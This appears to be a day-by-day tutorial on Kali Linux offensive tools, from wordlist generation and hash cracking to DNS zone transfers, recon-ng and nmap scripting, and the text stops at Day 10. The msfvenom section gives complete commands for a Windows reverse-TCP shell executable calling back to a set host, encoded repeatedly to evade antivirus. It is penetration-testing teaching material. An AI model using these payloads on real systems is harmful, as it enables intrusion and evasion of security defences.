- Day 1: CeWL
- Day 2: Password Mutation using John the Ripper
- Day 3: Hash Identification
- Day 4: Using Online Hash Databases
- Day 5: Zone Transfer Tool
- Day 6: recon-ng
- Day 7: urlcrazy
- Day 8: searchsploit
- Day 9: msfvenom
- Day 10: nmap Scripting Engine (NSE)
- Day 11: theharvester
- Day 12: BeEF
The first tool to be introduced is CeWL (Custom Word List Generator). CeWL crawls through a target website and return all the unique words found within the site.
CeWL can be run directly from the terminal in Kali Linux by issuing the command:
By default, this command will crawl through the target site, stopping at a maximum depth of 2. Also, it will (by default) return words that are at least of length 3.
To view all the options available in cewl, issue the command:
Some of the other useful options are:
-w / –write: Output to a word
-d / –depth <int>: Set the depth for CeWL to crawl
-m / –min_word_length: The minimum word length
-e / –email_file <filename>: Output email addresses to a file
Previously, using CeWL, we have generated a wordlist by crawling a website. However, this wordlist may not be very useful in bruteforcing password as users normally append a few digits behind their password. E.g. “password” may be mutated by the user to “password01”.
John the Ripper, can help to generate a new word list by including such mutation. To do that, new rules need to be created in the configuration file. By default, the location of the configuration file is /etc/john.conf. To add a new rule, simply append the rules to the configuration file.
To define a rule set that append a digit to the words in the word, append the following to the configuration file:
To define a rule set that append 2 digits to the words in the word, append the following to the configuration file:
To define a rule set that appends a pre-defined set of symbols to the words in the word, append the following to the configuration file:
To prepend instead of append, simply replace ‘$’ with ‘^’.
Lastly, to generate the new wordlist with password mutation, simply use the following command in the terminal.
john --wordlist=[path to the wordlist] --stdout --rules:[rule set name] > [genenerated wordlist file path]
john --wordlist=wordlist --stdout --rule:AppendDigits > newWordList
Looking at the new word list, you will notice 2 extra digits have been appended to each word. This also increases the size of the word list.
It is useful to identify the type of hash algorithm for a certain digest. It can help in password cracking by reducing the search space. In Kali, hash-identification can help to predict the hash algorithm used to derive a certain digest.
The usage is simple. The user will just need to input the digest, and the hash-identifier will attempt to guess the hash algorithm used. It will then provide a list of possible hash algorithm and least possible hash algorithm.
Original text: edgis
Tool Used to Generate the Digests: http://www.fileformat.info/tool/hash.htm
After identifying the type of hash algorithm, we can now try and crack the digest. One useful tool found in Kali Linux is findmyhash. findmyhash look up several online databases for a specific digest. Once it find a match, it will stop and return the corresponding text that can be used to derive the digest.
findmyhash <hash algorithm> -h <hash>
Original text: password
Do note that this process may take some time and may not yield any result (if the digest cannot be found in any of the online databases used by findmyhash).
Misconfigured DNS can often lead to exposure of data. One such example is the use of DNS zone transfer to discover information about an organisation. Dig and Host can be used to conduct zone transfer. In Kali Linux, zone transfer is made even easier with dnsenum.
dnsenum <URL of Site>
There are many options available in dnsenum. Some of the useful one are:
-t / –timeout: TCP and UDP timeout in seconds
–thread <values>: Set the number of threads to perform different queries
To view more options, use -h / –help
recong-ng is a powerful full-featured web reconnaissance framework. The usage is very similar to the Metasploit Framework (MSF).
There you go. Contact details of the domain name holder.
There are a lot of modules to explore. Some of the more interesting one:
recon/companies-contacts/facebook recon/creds-creds/leakdb recon/domain-creds/pwnedlist/leaks_dump recon/hosts-hosts/ip_neighbor recon/locations-locations/reverse_geocode
Have fun “recon-ing”.
urlcrazy is a tool in Kali Linux that generates and test domain name typos and variations to detect typo squatting, URL hijacking, phishing and corporate espionage.
searchsploit makes searching for exploits found inside Kali Linux very easy.
By specifying a keyword, searchsploit returns matching results and the file path to the exploit.
msfvenom is the successor of msfpayload and msfencode. Both msfpayload and msfencode are slated for retirement in the near future (June 2015). msfvenom consolidates the features of its predecessor and standardise its usage.
msfvenom is able to (1) generate various types of shellcode (features of msfpayload) and (2) encode shellcodes into format that can be easily deployed onto targets (features of msfencode).
To show available output formats:
Executable Formats: asp, aspx, aspx-exe, dll, elf, exe, exe-only, exe-service, exe-small, loop-vbs, macho, msi, msi-nouac, osx-app, psh, psh-net, psh-reflection, vba, vba-exe, vbs, war
Transform Formats: bash, c, csharp, dw, dword, java, js_be, js_le, num, perl, pl, powershell, ps1, py, python, raw, rb, ruby, sh, vbapplication, vbscript
Demo: Generate Payload (windows/shell/reverse_tcp)
In this payload, we will need to define both LHOST and LPORT. In this demo, I will set it as 192.168.1.100 and 5555 respectively, and output the payload in Python format.
Many times, there may be some bad characters in the payload that will cause the exploit to fail. One such example is \x00, the null bytes. To remove them, we can use the -b options.
We can also output the payload in executable format:
msfvenom -p windows/shell/reverse_tcp LHOST=192.168.1.100 LPORT=5555 -b “\x00” -f exe > shell-exe
Note: In this case, 1 round of shikata_ga_nai encoding is applied automatically. shikata_ga_nai is a polymorphic XOR additive feedback encoder. We can do extra encoding to evade antivirus detection. To encode the payload with shitaka_ga_nai 10 times:
msfvenom -p windows/shell/reverse_tcp LHOST=192.168.1.100 LPORT=5555 -b “\x00” -e “x86/shitaka_ga_nai” -i 10 -f exe > shell-exe
Notice both payloads yield almost the same detection rate? This is because most antivirus vendors know the templates used by Metasploit.
nmap Scripting Engine (NSE) features many scripts that can be used in a network penetration test. It allow users to write and automate networking tasks. It is written with the following features in mind (http://nmap.org/book/nse.html#nse-intro):
- Network Discovery
- More Sophisticated Version Detection
- Vulnerability Detection
- Backdoor Detection
- Vulnerability Exploitation
A list of available scripts can be found in the nmap documentation (http://nmap.org/nsedoc/).